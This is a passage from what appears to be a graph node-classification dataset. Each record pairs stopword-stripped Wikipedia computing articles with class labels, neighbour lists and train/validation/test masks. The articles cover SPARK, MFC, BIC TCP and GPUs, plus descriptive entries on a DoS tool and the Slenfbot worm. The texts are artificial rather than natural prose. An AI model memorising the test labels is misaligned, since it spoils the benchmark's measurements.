percent battery life improvements tested clevo m1100 netbook intel atom n450 processor three-cell battery support pcs netbooks version 1.2 announced march 2011 renamed joli os new version featured new boot screen auto guest mode log-ins local file system integrated within desktop remote access desktop html5-capable browser optional background updates support latest chromium 10 browser flash 10.2 version 1.2 also includes dropbox integration app creation wizard file browser access local files preview dropbox files edit using google docs uses 2.2 gb disk space installed",
    "neighbors": [
      7938,
      9732,
      8837,
      5384,
      5386,
      6539,
      7435,
      4623,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      3109,
      9253,
      10021,
      10149,
      11305,
      7854,
      5681,
      2738,
      4790,
      439,
      56,
      8122,
      59,
      3903,
      4673,
      1346,
      708,
      2375,
      4039,
      8907,
      11221,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      9461,
      1400,
      6393,
      11388,
      8957,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 10647,
    "label": 5,
    "text": "Link_access_procedure:link access procedure link access procedure lap protocols data link layer protocols framing transmitting data across point-to-point links lap originally derived hdlc high-level data link control later updated renamed lapb lap balanced lapb data link protocol x.25 related lap protocols",
    "neighbors": [
      7360,
      10947,
      1127,
      5021,
      4543
    ],
    "mask": "Test"
  },
  {
    "node_id": 10648,
    "label": 1,
    "text": "Hospital_Records_Database:hospital records database hospital records database database provided wellcome trust uk national archives provides information existence location records uk hospitals includes location dates administrative clinical records existence catalogues links online hospital catalogues website proposed resource month royal society medicine 2009",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10649,
    "label": 9,
    "text": "SPARK_(programming_language):spark programming language spark formally defined computer programming language based ada programming language intended development high integrity software used systems predictable highly reliable operation essential facilitates development applications demand safety security business integrity originally three versions spark language spark83 spark95 spark2005 based ada 83 ada 95 ada 2005 respectively fourth version spark language spark 2014 based ada 2012 released april 30 2014 spark 2014 complete re-design language supporting verification tools spark language consists well-defined subset ada language uses contracts describe specification components form suitable static dynamic verification spark83/95/2005 contracts encoded ada comments ignored standard ada compiler processed spark examiner associated tools spark 2014 contrast uses ada 2012 built-in aspect syntax express contracts bringing core language main tool spark 2014 gnatprove based gnat/gcc infrastructure re-uses almost entirety gnat ada 2012 front-end spark aims exploit strengths ada trying eliminate potential ambiguities insecurities spark programs design meant unambiguous behavior required unaffected choice ada compiler goals achieved partly omitting ada problematic features unrestricted parallel tasking partly introducing contracts encode application designer intentions requirements certain components program combination approaches meant allow spark meet design objectives consider ada subprogram specification subprogram actually pure ada could virtually anything – might increment codice_1 one one thousand might set global counter codice_1 return original value counter codice_1 might absolutely nothing codice_1 spark 2014 contracts added code provide additional information regarding subprogram actually example may alter specification say specifies codice_5 procedure use neither update read global variable data item used calculating new value codice_1 codice_1 alternatively designer might specify specifies codice_5 use global variable codice_9 package codice_5 exported value codice_9 depends imported values codice_9 codice_1 exported value codice_1 depend variables derived constant data gnatprove run specification corresponding body subprogram analyse body subprogram build model information flow model compared specified annotations discrepancies reported user extend specifications asserting various properties either need hold subprogram called preconditions hold execution subprogram completed postconditions example could say following specifies codice_1 derived alone also codice_5 called codice_1 must strictly less last possible value type afterwards codice_1 equal initial value codice_1 plus one gnatprove also generate set verification conditions vcs vcs used attempt establish certain properties hold given subprogram minimum gnatprove generate vcs attempting establish run-time errors occur within subprogram postcondition assertions added subprogram gnatprove also generate vcs require user show properties hold possible paths subprogram hood gnatprove uses why3 intermediate language vc generator cvc4 z3 alt-ergo theorem provers discharge vcs use provers including interactive proof checkers also possible components why3 toolset first version spark based ada 83 produced university southampton uk ministry defence sponsorship bernard carré trevor jennings subsequently language progressively extended refined first program validation limited praxis critical systems limited 2004 praxis critical systems limited changed name praxis high integrity systems limited january 2010 company became altran praxis early 2009 praxis formed partnership adacore released spark pro terms gpl followed june 2009 spark gpl edition 2009 aimed floss academic communities june 2010 altran-praxis announced spark programming language would used software us lunar project cubesat expected completed 2015 january 2013 altran-praxis changed name altran first pro release spark 2014 announced april 30 2014 quickly followed spark 2014 gpl edition aimed floss academic communities spark used several high profile safety-critical systems covering commercial aviation rolls-royce trent series jet engines arinc acams system lockheed martin c130j military aviation eurofighter typhoon harrier gr9 aermacchi m346 air-traffic management uk nats ifacts system rail numerous signalling applications medical lifeflow ventricular assist device space applications vermont technical college cubesat project spark also used secure systems development users include rockwell collins turnstile secureone cross-domain solutions development original multos ca nsa tokeneer demonstrator secunet multi-level workstation muen separation kernel august 2010 rod chapman principal engineer altran praxis implemented skein one candidates sha-3 spark wanted compare performance spark c implementations careful optimization managed spark version 5 10 slower c. later improvement ada middle-end gcc implemented eric botcazou adacore closed gap spark code matching c performance exactly",
    "neighbors": [
      9345,
      6797,
      1952,
      5796,
      428,
      5677,
      7983,
      823,
      963,
      8262,
      7889,
      6228,
      4572,
      11625,
      8554,
      8810,
      5612,
      7671,
      5880,
      3705
    ],
    "mask": "Test"
  },
  {
    "node_id": 10650,
    "label": 9,
    "text": "Variable_Data_Intelligent_Postscript_Printware:variable data intelligent postscript printware variable data intelligent postscript printware open language xerox enables highest-performance output variable-data postscript documents used freeflow vi suite vipp front end vipp originally called xgf simply groups postscript dictionaries provide macros simplify writing complex postscript commands postscript powerful language allows variable data printing personalization data stream right commands implement features programmer write sometimes many lines code xerox developed macro procedures postscript language dictionaries make page control easier example merge graphic form data stream requires understanding postscript commands according adobe postscript language reference manual plrm otherwise known red book xerox gives feature simple command formname setform formname name form accessible xerox printer controller docusp freeflow print server several vipp commands identical postscript commands vipp originally written couple xerox systems analysts switzerland enable highest speed postscript printers time 50 pages per minute features xerox proprietary production printing languages pdl fdl provide simple variable data printing xerox corporation adopted idea developed work putting procedures sun microsystems hosts adobe interpreter also resides together modules give complete control printing engine data stream vipp used four different modes database mode line mode xml mode native mode database mode programmer quickly implement printing solution example billing application delimited database file line mode existing print application enhanced form overlays font selection color features offered modern laser printers xml mode xml file turned readable document modes vipp offers conditional logic manipulation data example multi-page bill could printed duplex two-sided mode first page selected paper tray loaded perforated sheet remittance return back side printed disclosures instructions subsequent pages billing detail printed plain paper vipp programmer might even insert ocr micr line remittance processing complete check digit xerox markets interactive development environment vipp called freeflow vi designer freeflow vipp pro publisher help programmer code applications rapidly vipp freeflow vipp pro publisher plugin popular adobe indesign product enabling wysiwyg vipp development vipp licensed specific printer controllers running solaris microsoft windows operating system including postscript capable office devices non-volatile memory hard disk vipp capable installed device postscript interpreter freeflow print server ffps formerly docusp vipp enabled limited producing 200 pages appropriately licensed",
    "neighbors": [
      5857,
      8628,
      6797,
      9665
    ],
    "mask": "Test"
  },
  {
    "node_id": 10651,
    "label": 4,
    "text": "UDP_Unicorn:udp unicorn udp unicorn free open source dos attack software software attacks computer network connection repeatedly sending udp packets garbage data udp unicorn uses winsock create sockets send udp packets",
    "neighbors": [
      2409,
      7983,
      11413,
      2045,
      7102
    ],
    "mask": "None"
  },
  {
    "node_id": 10652,
    "label": 2,
    "text": "IBM_XCF:ibm xcf ibm mainframes cross-system coupling facility xcf component z/os manages communications applications sysplex applications may system different systems systems communicate using messages transported one two mechanisms parallel sysplex decisions two transport mechanisms use routing specific message made dynamically within single z/os system messages transported using cross-memory services rather routed either physical transport mechanisms applications join specific groups individual members joining group member send receive messages individual messages assigned specific transport classes based message size transport class owns input output buffers routing decisions made transport class level",
    "neighbors": [
      2168,
      7053,
      9838
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10653,
    "label": 5,
    "text": "BIC_TCP:bic tcp bic tcp binary increase congestion control one congestion control algorithms used transmission control protocol tcp bic optimized high speed networks high latency so-called long fat networks networks bic significant advantage previous congestion control schemes correcting severely underutilized bandwidth bic implements unique congestion window cwnd algorithm algorithm tries find maximum cwnd searching three parts binary search increase additive increase slow start network failure occurs bic uses multiplicative decrease correcting cwnd bic tcp implemented used default linux kernels 2.6.8 default implementation changed cubic tcp 2.6.19 version define following variables every rtt interval update cwnd following packets dropped congestion window cwnd increases three distinct ways binary search increase additive increase slow start step one used increment one step increasing cwnd one packets dropped cwnd reduced using multiplicative decrease requires β used decreasing cwnd 100×β case two flows one large cwnd small cwnd fast convergence used decrease greater cwnd flow w greater rate smaller cwnd flow allow faster convergence greater cwnd flow increasing cwnd one step decreasing cwnd",
    "neighbors": [
      7017,
      10924,
      941,
      2934,
      823,
      5817,
      9021,
      3006
    ],
    "mask": "None"
  },
  {
    "node_id": 10654,
    "label": 2,
    "text": "Microsoft_Foundation_Class_Library:microsoft foundation class library microsoft foundation class library mfc c++ object-oriented library developing desktop applications windows mfc introduced microsoft 1992 quickly gained widespread use microsoft introduced alternative application frameworks since mfc remains widely used mfc introduced 1992 microsoft c/c++ 7.0 compiler use 16-bit versions windows extremely thin object-oriented c++ wrapper windows api c++ beginning replace c development commercial application software time mfc program direct windows api calls rarely needed instead programs create objects microsoft foundation class classes call member functions belonging objects many functions share names corresponding api functions one quirk mfc use afx prefix many functions macros standard precompiled header name stdafx.h early development became mfc called application framework extensions abbreviated afx name microsoft foundation classes mfc adopted late release cycle change references mfc 8.0 released visual studio 2005 mfc 9.0 released visual studio 2008 april 7 2008 microsoft released update mfc classes out-of-band update visual studio 2008 mfc 9 update features new user interface constructs including ribbons associated ui widgets fully customizable toolbars docking panes either freely floated docked side document tabs mfc initially feature commercial versions visual studio included freeware visual c++ express community edition visual studio introduced 2014 however includes mfc object windows library owl designed use borland turbo c++ compiler competing product introduced borland around time eventually borland discontinued owl development licensed distribution mfc headers libraries dlls microsoft short time though never offered fully integrated support mfc borland later released visual component library replace owl framework mfc library wraps portions windows api c++ classes including functionality enables use default application framework classes defined many handle-managed windows objects also predefined windows common controls time introduction mfc provided c++ macros windows message-handling via message maps exceptions run-time type identification rtti serialization dynamic class instantiation macros message-handling aimed reduce memory consumption avoiding gratuitous virtual table use also provide concrete structure various visual c++-supplied tools edit manipulate code without parsing full language message-handling macros replaced virtual function mechanism provided c++ macros serialization exceptions rtti predated availability features microsoft c++ number years 32-bit versions mfc windows nt 3.1 later windows operating systems used compilers implemented language features updated macros simply wrap language features instead providing customized implementations realizing upward compatibility mfc ribbon resource editor allows developer design ribbon graphically instead use xml-based declarative markup like ribbonx api optionally ribbon components may programmed directly calling new set ribbon class methods developer may mix graphical programmatic ribbon development convenient mfc application wizard also upgraded support new features including check-box select whether application use ribbon docking panes new functionality provided new classes old applications still continue run update building top bcgsoft ’ bcgcontrolbar library professional edition microsoft imposed additional licensing requirements users ribbons include requirement adhere microsoft ui design guidelines anti-competition clause prohibiting use ui applications compete microsoft office mfc used linking static library adding mfc dll",
    "neighbors": [
      10243,
      2062,
      10769,
      9234,
      1043,
      9755,
      9245,
      1055,
      2083,
      8227,
      1577,
      2603,
      5165,
      5677,
      3631,
      4143,
      9263,
      4658,
      11316,
      1077,
      8246,
      576,
      8771,
      4173,
      4174,
      4178,
      9813,
      10841,
      603,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      1656,
      9848,
      5754,
      7292,
      9340,
      639,
      1664,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3734,
      3224,
      4771,
      7846,
      4777,
      10414,
      11442,
      692,
      8391,
      214,
      4822,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      10470,
      1770,
      11498,
      3821,
      10991,
      10480,
      2804,
      6927,
      9491,
      1812,
      5401,
      5913,
      8473,
      11546,
      4384,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      11071,
      5952,
      1347,
      1348,
      844,
      8524,
      8015,
      10079,
      11616,
      8554,
      9579,
      5492,
      10101,
      2943,
      3462,
      8582,
      9609,
      9612,
      3471,
      9114,
      8607,
      1952,
      11683,
      9128,
      8618,
      6584,
      2493,
      8644,
      4550,
      7629,
      479,
      8161,
      6114,
      5612,
      9196,
      4590,
      11247,
      3573,
      10229,
      2556,
      2045,
      5119
    ],
    "mask": "Train"
  },
  {
    "node_id": 10655,
    "label": 2,
    "text": "Zen_Bound:zen bound zen bound puzzle game ios android maemo platforms nokia n900 developed secret exit announced september 5 2008 via company discussion board officially released via app store february 24 2009 via ovi store june 16 2010 port android announced part humble bundle android 2 march 19 2012 game received press attention unique gameplay lite version game also released free featured 2 levels game goal game paint various objects level player given object attached rope varies length depending level using mouse touch screen tilt controls player attempts wrap object rope time rope laid object area near rope gets covered paint challenge getting required percentage object painted finite length rope three targets level minimum medium maximum coverage levels require nails protruding objects entwined rope rather cover object surface 5th imgawards international mobile gaming awards 2008 excellence 3d game extremely well received reviews upon release following review scores websites pocketgamer 10/10 platinum award ign 9.5/10 slidetoplay 4/4 time game highest rated gamerankings.com score 97.86 overtaken grand theft auto v 2014",
    "neighbors": [
      482,
      3300,
      9063,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10656,
    "label": 4,
    "text": "Columbitech:columbitech columbitech founded 2000 provides wireless security secure mobile devices support wlan public networks including 3g 4g wimax company headquartered stockholm sweden offices new york city columbitech mobile vpn provides remote network access field mobility users corporate wlan users telecommuters – mobilizing enterprise solution encrypted standards-based wireless transport layer security wtls holds fips 140-2 certification technology utilized retail industry meet pci dss requirements industries mobile devices used wireless networks",
    "neighbors": [
      1160,
      420,
      9640
    ],
    "mask": "Test"
  },
  {
    "node_id": 10657,
    "label": 4,
    "text": "Slenfbot:slenfbot slenfbot classification family malicious software malware infects files microsoft windows systems slenfbot first discovered 2007 since numerous variants followed slightly different characteristics new additions worm payload ability provide attacker unauthorized access compromised host slenfbot primarily spreads luring users follow links websites contain malicious payload slenfbot propagates via instant messaging applications removable drives and/or local network via network shares code slenfbot appears closely managed may provide attribution single group and/or indicate large portion code shared amongst multiple groups inclusion malware families variants well continuous evolution makes slenfbot highly effective downloader propensity cause even damage compromised systems majority antivirus a/v vendors use following naming conventions referring family malware end names wildcard possible classifications and/or distinctions malware family none publicly known slenfbot worm spreads using links websites containing malicious software malware via instant messaging programs may include msn/windows live messenger aol instant messenger aim yahoo messenger google chat facebook chat icq skype worm propagates automatically via removable drives shares local network windows file sharing service i.e. server lanmanserver service slenfbot also contains backdoor capabilities allow unauthorized access affected machine. ref name= microsoft_win32/slenfbot /ref ref name= microsoft_worm win32/stekct.a /ref ref name= microsoft_worm win32/stekct.b /ref ref name= win32/slenfbot-just_another_irc_bot /ref ref name= ca_win32/slenfbot /ref ref name= win32/slenfbot.ad /ref code appears closely controlled may provide attribution one group and/or malware authors share significant portion code slenfbot seen wild since 2007 obtained new features capabilities time subsequent variants systematically gained similar feature sets slenfbot continues operate effective infector dynamic downloader additional malware thus making highly functional delivery mechanism spyware information stealers spam bots well malware executed slenfbot copies duplicate malicious payload system folder filename varies per particular variant sets attributes copy read hidden system hide contents windows explorer worm makes changes registry maintain persistence malware executes duplicate copy subsequent startup system e.g copying malicious executable hklm\\software\\microsoft\\windows\\currentversion\\run subkey several variants may modify registry installation add malware list applications authorized access internet thus allowing malware communicate without raising windows security alerts run unimpeded windows firewall cases variants may instead modify registry install malicious payload debugger benign system file ctfmon.exe ctfmon.exe executes system startup leads execution malware cases slenfbot attempt delete original copy worm variants may make additional modifications registry order delete originally executed copy worm system restarts slenfbot variants may initial execution test see msn/windows live messenger currently running looking window class name msblwindowclass worm finds window malware may display fake error message slenfbot launched removable drive variants may open windows explorer display contents affected drive certain slenfbot variants may inject thread explorer.exe periodically checks presence malware system folder file found malware downloads new copy specified server launches new copy slenfbot uses instant messaging attack vector spread worm accounts contacts remote attacker may use worm ’ backdoor capabilities instruct slenfbot spread via msn/windows live messenger aol instant messenger aim yahoo messenger google chat facebook chat icq skype worm connects remote server sends copy url contains list possible messages send randomly creates zip archive contains copy malware sends zip archive instant messaging client contacts following examples messages worm may spread zip file includes file name slenfbot executable may also contain url file download situations attacker instructs worm send arbitrary file slenfbot may spread removable drives creating directory called “ recycler ” root directory removable drive malware create subdirectory “ recycler ” folder e.g “ s-1-6-21-1257894210-1075856346-012573477-2315 ” copy malicious payload directory using different name executable e.g “ folderopen.exe ” slenfbot may also create autorun.inf file root directory drive worm may execute drive connected another system certain variants may download updated copy slenfbot location specified worm write file directory e.g using name “ ~secure ” locations worm copies slenfbot sets hidden system attributes respective directories files circumstances due programming issue slenfbot may create one directory rather two e.g “ e \\recyclers-1-6-21-1257894210-1075856346-012573477-2315\\folderopen.exe ” slenfbot may spread accessible shares upon successful compromise system worm may also spread file print shares exploiting known vulnerabilities ms06-040 ms10-061 pertain issues server print spooler services respectively attacker would instruct worm spread remote system via exploit instant messaging order continue propagation slenfbot following steps may help prevent infection slenfbot uses stealth measures maintain persistence system thus may need boot trusted environment order remove slenfbot may also make changes computer changes windows registry makes difficult download install and/or update virus protection also since many variants slenfbot attempt propagate available removable/remote drives network shares important ensure recovery process thoroughly detects removes malware known/possible locations one possible solution would use microsoft ’ windows defender offline beta detect remove slenfbot system information windows defender offline go http //windows.microsoft.com/en-us/windows/what-is-windows-defender-offline",
    "neighbors": [
      3072,
      10756,
      3724,
      6797,
      3347,
      4883,
      2325,
      278,
      9630,
      2213,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10658,
    "label": 3,
    "text": "Graphics_processing_unit:graphics processing unit graphics processing unit gpu specialized electronic circuit designed rapidly manipulate alter memory accelerate creation images frame buffer intended output display device gpus used embedded systems mobile phones personal computers workstations game consoles modern gpus efficient manipulating computer graphics image processing highly parallel structure makes efficient general-purpose central processing units cpus algorithms process large blocks data parallel personal computer gpu present video card embedded motherboard certain cpus embedded cpu die term gpu coined sony reference playstation console toshiba-designed sony gpu 1994 term popularized nvidia 1999 marketed geforce 256 world first gpu presented single-chip processor integrated transform lighting triangle setup/clipping rendering engines rival ati technologies coined term visual processing unit vpu release radeon 9700 2002 arcade system boards using specialized graphics chips since 1970s early video game hardware ram frame buffers expensive video chips composited data together display scanned monitor fujitsu mb14241 video shifter used accelerate drawing sprite graphics various 1970s arcade games taito midway gun fight 1975 sea wolf 1976 space invaders 1978 namco galaxian arcade system 1979 used specialized graphics hardware supporting rgb color multi-colored sprites tilemap backgrounds galaxian hardware widely used golden age arcade video games game companies namco centuri gremlin irem konami midway nichibutsu sega taito home market atari 2600 1977 used video shifter called television interface adaptor atari 8-bit computers 1979 antic video processor interpreted instructions describing display list —the way scan lines map specific bitmapped character modes memory stored need contiguous frame buffer 6502 machine code subroutines could triggered scan lines setting bit display list instruction antic also supported smooth vertical horizontal scrolling independent cpu nec µpd7220 first implementation pc graphics display processor single large scale integration lsi integrated circuit chip enabling design low-cost high-performance video graphics cards number nine visual technology became best known graphics processing unit mid-1980s first fully integrated vlsi large-scale integration metal-oxide-semiconductor nmos graphics display processor pcs supported 1024x1024 resolution laid foundations emerging pc graphics market used number graphics cards licensed clones intel 82720 first intel graphics processing units williams electronics arcade games robotron 2084 joust sinistar bubbles released 1982 contain custom blitter chips operating 16-color bitmaps 1984 hitachi released artc hd63484 first major cmos graphics processor pc artc capable displaying 4k resolution monochrome mode used number pc graphics cards terminals late 1980s 1985 commodore amiga featured custom graphics chip blitter unit accelerating bitmap manipulation line draw area fill functions also included coprocessor simple instruction set capable manipulating graphics hardware registers sync video beam e.g per-scanline palette switches sprite multiplexing hardware windowing driving blitter 1986 texas instruments released tms34010 first fully programmable graphics processor could run general-purpose code graphics-oriented instruction set 1990-1992 chip would become basis texas instruments graphics architecture tiga windows accelerator cards 1987 ibm 8514 graphics system released one first video cards ibm pc compatibles implement fixed-function 2d primitives electronic hardware sharp x68000 released 1987 used custom graphics chipset 65,536 color palette hardware support sprites scrolling multiple playfields eventually serving development machine capcom cp system arcade board fujitsu later competed fm towns computer released 1989 support full 16,777,216 color palette 1988 first dedicated polygonal 3d graphics boards introduced arcades namco system 21 taito air system ibm proprietary video graphics array vga display standard introduced 1987 maximum resolution 640×480 pixels november 1988 nec home electronics announced creation video electronics standards association vesa develop promote super vga svga computer display standard successor ibm proprietary vga display standard super vga enabled graphics display resolutions 800×600 pixels 36 increase 1991 s3 graphics introduced s3 86c911 designers named porsche 911 indication performance increase promised 86c911 spawned host imitators 1995 major pc graphics chip makers added 2d acceleration support chips time fixed-function windows accelerators surpassed expensive general-purpose graphics coprocessors windows performance coprocessors faded away pc market throughout 1990s 2d gui acceleration continued evolve manufacturing capabilities improved level integration graphics chips additional application programming interfaces apis arrived variety tasks microsoft wing graphics library windows 3.x later directdraw interface hardware acceleration 2d games within windows 95 later early- mid-1990s real-time 3d graphics becoming increasingly common arcade computer console games led increasing public demand hardware-accelerated 3d graphics early examples mass-market 3d graphics hardware found arcade system boards sega model 1 namco system 22 sega model 2 fifth-generation video game consoles saturn playstation nintendo 64 arcade systems sega model 2 namco magic edge hornet simulator 1993 capable hardware l transform clipping lighting years appearing consumer graphics cards systems used dsps accelerate transformations fujitsu worked sega model 2 arcade system began working integrating l single lsi solution use home computers 1995 fujitsu pinolite first 3d geometry processor personal computers released 1997 first hardware l gpu home video game consoles nintendo 64 reality coprocessor released 1996 1997 mitsubishi released 3dpro/2mp fully featured gpu capable transformation lighting workstations windows nt desktops ati utilized firegl 4000 graphics card released 1997 term gpu coined sony reference 32-bit sony gpu designed toshiba playstation video game console released 1994 pc world notable failed first tries low-cost 3d graphics chips s3 virge ati rage matrox mystique chips essentially previous-generation 2d accelerators 3d features bolted many even pin-compatible earlier-generation chips ease implementation minimal cost initially performance 3d graphics possible discrete boards dedicated accelerating 3d functions lacking 2d gui acceleration entirely powervr 3dfx voodoo however manufacturing technology continued progress video 2d gui acceleration 3d functionality integrated one chip rendition verite chipsets among first well enough worthy note 1997 rendition went step collaborating hercules fujitsu thriller conspiracy project combined fujitsu fxg-1 pinolite geometry processor vérité v2200 core create graphics card full l engine years nvidia geforce 256 card designed reduce load placed upon system cpu never made market opengl appeared early '90s professional graphics api originally suffered performance issues allowed glide api step become dominant force pc late '90s however issues quickly overcome glide api fell wayside software implementations opengl common time although influence opengl eventually led widespread hardware support time parity emerged features offered hardware offered opengl directx became popular among windows game developers late 90s unlike opengl microsoft insisted providing strict one-to-one support hardware approach made directx less popular standalone graphics api initially since many gpus provided specific features existing opengl applications already able benefit leaving directx often one generation behind see comparison opengl direct3d time microsoft began work closely hardware developers started target releases directx coincide supporting graphics hardware direct3d 5.0 first version burgeoning api gain widespread adoption gaming market competed directly many more-hardware-specific often proprietary graphics libraries opengl maintained strong following direct3d 7.0 introduced support hardware-accelerated transform lighting l direct3d opengl capability already exposed inception 3d accelerator cards moved beyond simple rasterizers add another significant hardware stage 3d rendering pipeline nvidia geforce 256 also known nv10 first consumer-level card released market hardware-accelerated l professional 3d cards already capability hardware transform lighting already existing features opengl came consumer-level hardware '90s set precedent later pixel shader vertex shader units far flexible programmable nvidia first produce chip capable programmable shading geforce 3 code named nv20 pixel could processed short program could include additional image textures inputs geometric vertex could likewise processed short program projected onto screen used xbox console competed playstation 2 used custom vector dsp hardware accelerated vertex processing commonly referred vu0/vu1 earliest incarnations shader execution engines used xbox general purpose could execute arbitrary pixel code vertices pixels processed different units resources pixel shaders much tighter constraints executed much higher frequencies vertices pixel shading engines actually akin highly customizable function block n't really run program many disparities vertex pixel shading would n't addressed much later unified shader model october 2002 introduction ati radeon 9700 also known r300 world first direct3d 9.0 accelerator pixel vertex shaders could implement looping lengthy floating point math quickly becoming flexible cpus yet orders magnitude faster image-array operations pixel shading often used bump mapping adds texture make object look shiny dull rough even round extruded introduction geforce 8 series produced nvidia new generic stream processing unit gpus became generalized computing device today parallel gpus begun making computational inroads cpu subfield research dubbed gpu computing gpgpu general purpose computing gpu found way fields diverse machine learning oil exploration scientific image processing linear algebra statistics 3d reconstruction even stock options pricing determination gpgpu time precursor call compute shaders e.g cuda opencl directcompute actually abused hardware degree treating data passed algorithms texture maps executing algorithms drawing triangle quad appropriate pixel shader obviously entails overheads since involve units like scan converter n't really needed even care triangles except invoke pixel shader years energy consumption gpus increased manage several techniques proposed nvidia cuda platform first introduced 2007 earliest widely adopted programming model gpu computing recently opencl become broadly supported opencl open standard defined khronos group allows development code gpus cpus emphasis portability opencl solutions supported intel amd nvidia arm according recent report evan data opencl gpgpu development platform widely used developers us asia pacific 2010 nvidia began partnership audi power cars dashboards tegra gpus powering cars dashboard offering increased functionality cars navigation entertainment systems advancements gpu technology cars helped push self-driving technology amd radeon hd 6000 series cards released 2010 2011 amd released 6000m series discrete gpus used mobile devices kepler line graphics cards nvidia came 2012 used nvidia 600 700 series cards new feature new gpu microarchitecture included gpu boost technology adjusts clock-speed video card increase decrease according power draw kepler microarchitecture manufactured 28 nm process ps4 xbox one released 2013 use gpus based amd radeon hd 7850 7790 nvidia kepler line gpus followed maxwell line manufactured process 28 nm chips nvidia manufactured tsmc taiwan semiconductor manufacturing company manufacturing using 28 nm process time compared 40 nm technology past new manufacturing process allowed 20 percent boost performance drawing less power virtual reality headsets high system requirements vr headset manufacturers recommended gtx 970 r9 290x better time release pascal next generation consumer graphics cards nvidia released 2016 geforce 10 series cards generation graphics cards made using 16 nm manufacturing process improves upon previous microarchitectures nvidia released one non-consumer card new volta architecture titan v. changes titan xp pascal high-end card include increase number cuda cores addition tensor cores hbm2 tensor cores cores specially designed deep learning high-bandwidth memory on-die stacked lower-clocked memory offers extremely wide memory bus useful titan v intended purpose emphasize titan v gaming card nvidia removed geforce gtx suffix adds consumer gaming cards new generation rtx turing gpus unveiled august 20 2018 add ray-tracing cores gpus improving performance lighting effects polaris 11 polaris 10 gpus amd fabricated 14-nanometer process release results substantial increase performance per watt amd video cards amd also released vega gpus series high end market competitor nvidia high end pascal cards also featuring hbm2 like titan v. many companies produced gpus number brand names 2009 intel nvidia amd/ati market share leaders 49.4 27.8 20.6 market share respectively however numbers include intel integrated graphics solutions gpus counting nvidia amd control nearly 100 market 2018 respective market shares 66 33 addition s3 graphics matrox produce gpus modern smartphones also using mostly adreno gpus qualcomm powervr gpus imagination technologies mali gpus arm modern gpus use transistors calculations related 3d computer graphics addition 3d hardware today gpus include basic 2d acceleration framebuffer capabilities usually vga compatibility mode newer cards like amd/ati hd5000-hd7000 even lack 2d acceleration emulated 3d hardware gpus initially used accelerate memory-intensive work texture mapping rendering polygons later adding units accelerate geometric calculations rotation translation vertices different coordinate systems recent developments gpus include support programmable shaders manipulate vertices textures many operations supported cpus oversampling interpolation techniques reduce aliasing high-precision color spaces computations involve matrix vector operations engineers scientists increasingly studied use gpus non-graphical calculations especially suited embarrassingly parallel problems emergence deep learning importance gpus increased research done indigo found training deep learning neural networks gpus 250 times faster cpus explosive growth deep learning recent years attributed emergence general purpose gpus level competition area asics prominently tensor processing unit tpu made google however require changes existing code gpus still popular gpus made since 1995 support yuv color space hardware overlays important digital video playback many gpus made since 2000 also support mpeg primitives motion compensation idct process hardware accelerated video decoding portions video decoding process video post-processing offloaded gpu hardware commonly referred gpu accelerated video decoding gpu assisted video decoding gpu hardware accelerated video decoding gpu hardware assisted video decoding recent graphics cards even decode high-definition video card offloading central processing unit common apis gpu accelerated video decoding dxva microsoft windows operating system vdpau vaapi xvmc xvba linux-based unix-like operating systems except xvmc capable decoding videos encoded mpeg-1 mpeg-2 mpeg-4 asp mpeg-4 part 2 mpeg-4 avc h.264 divx 6 vc-1 wmv3/wmv9 xvid opendivx divx 4 divx 5 codecs xvmc capable decoding mpeg-1 mpeg-2 video decoding processes accelerated today modern gpu hardware personal computers two main forms gpus many synonyms gpus designed specific usage real-time 3d graphics mass calculations gpus powerful class typically interface motherboard means expansion slot pci express pcie accelerated graphics port agp usually replaced upgraded relative ease assuming motherboard capable supporting upgrade graphics cards still use peripheral component interconnect pci slots bandwidth limited generally used pcie agp slot available dedicated gpu necessarily removable necessarily interface motherboard standard fashion term dedicated refers fact dedicated graphics cards ram dedicated card use fact dedicated gpus removable ram usually specially selected expected serial workload graphics card see gddr sometimes systems dedicated discrete gpus called dis systems opposed uma systems see next section dedicated gpus portable computers commonly interfaced non-standard often proprietary slot due size weight constraints ports may still considered pcie agp terms logical host interface even physically interchangeable counterparts technologies sli nvidia crossfire amd allow multiple gpus draw images simultaneously single screen increasing processing power available graphics integrated graphics processing unit igpu integrated graphics shared graphics solutions integrated graphics processors igp unified memory architecture uma utilize portion computer system ram rather dedicated graphics memory igps integrated onto motherboard part chipset die cpu like amd apu intel hd graphics certain motherboards amd igps use dedicated sideport memory separate fixed block high performance memory dedicated use gpu early 2007 computers integrated graphics account 90 pc shipments less costly implement dedicated graphics processing tend less capable historically integrated processing often considered unfit play 3d games run graphically intensive programs could run less intensive programs adobe flash examples igps would offerings sis via circa 2004 however modern integrated graphics processors amd accelerated processing unit intel hd graphics capable handling 2d graphics low stress 3d graphics gpu extremely memory intensive integrated processing may find competing cpu relatively slow system ram minimal dedicated video memory igps 29.856 gb/s memory bandwidth system ram whereas graphics card may 264 gb/s bandwidth ram gpu core memory bus bandwidth limit performance gpu though multi-channel memory mitigate deficiency older integrated graphics chipsets lacked hardware transform lighting newer ones include newer class gpus competes integrated graphics low-end desktop notebook markets common implementations ati hypermemory nvidia turbocache hybrid graphics cards somewhat expensive integrated graphics much less expensive dedicated graphics cards share memory system small dedicated memory cache make high latency system ram technologies within pci express make possible solutions sometimes advertised much 768mb ram refers much shared system memory becoming increasingly common use general purpose graphics processing unit gpgpu modified form stream processor vector processor running compute kernels concept turns massive computational power modern graphics accelerator shader pipeline general-purpose computing power opposed hard wired solely graphical operations certain applications requiring massive vector operations yield several orders magnitude higher performance conventional cpu two largest discrete see dedicated graphics cards gpu designers amd nvidia beginning pursue approach array applications nvidia amd teamed 